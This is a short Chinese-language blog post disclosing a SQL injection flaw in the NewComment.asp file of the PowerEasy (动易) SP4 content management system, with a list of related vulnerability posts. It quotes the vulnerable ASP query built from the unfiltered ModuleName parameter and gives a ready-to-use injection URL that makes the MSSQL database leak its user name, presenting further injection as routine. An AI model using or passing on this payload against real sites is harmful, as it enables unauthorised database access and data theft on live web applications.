Chinadu's Blog

今天BCT把动易SP4的漏洞公布了，既然都公布了，那么还是发出来吧！

在NewComment.asp文件中

ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的
SQL语句


If ModuleName <> "" Then
    If ChannelID <> 0 Then
        If ClassID <> 0 Then
            sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True

sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1


在A.ChannelID=1后就可以构造我们的SQL语句。（其中空格用+来代替。）


NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--

例如这样就可以暴mssql用户名

省下的就是sql注入老

相关文章

• 2006年10月28日 -- 动易2006 SP4版最新漏洞
• 2009年09月4日 -- DVBBS php v2.0 boardrule.php注入漏洞
• 2009年08月28日 -- dedecms 5.3 – 5.5注入漏洞
• 2008年11月9日 -- Discuz! $_DCACHE数组变量覆盖漏洞
• 2006年10月8日 -- JIMMY中文站留言簿漏洞利用
• 2012年02月10日 -- Xpath SQL Injection
• 2011年09月21日 -- WPA2不再安全 无线加密协议曝惊天漏洞
• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年08月3日 -- 黑帽大会：HTTPS和SSL存在安全漏洞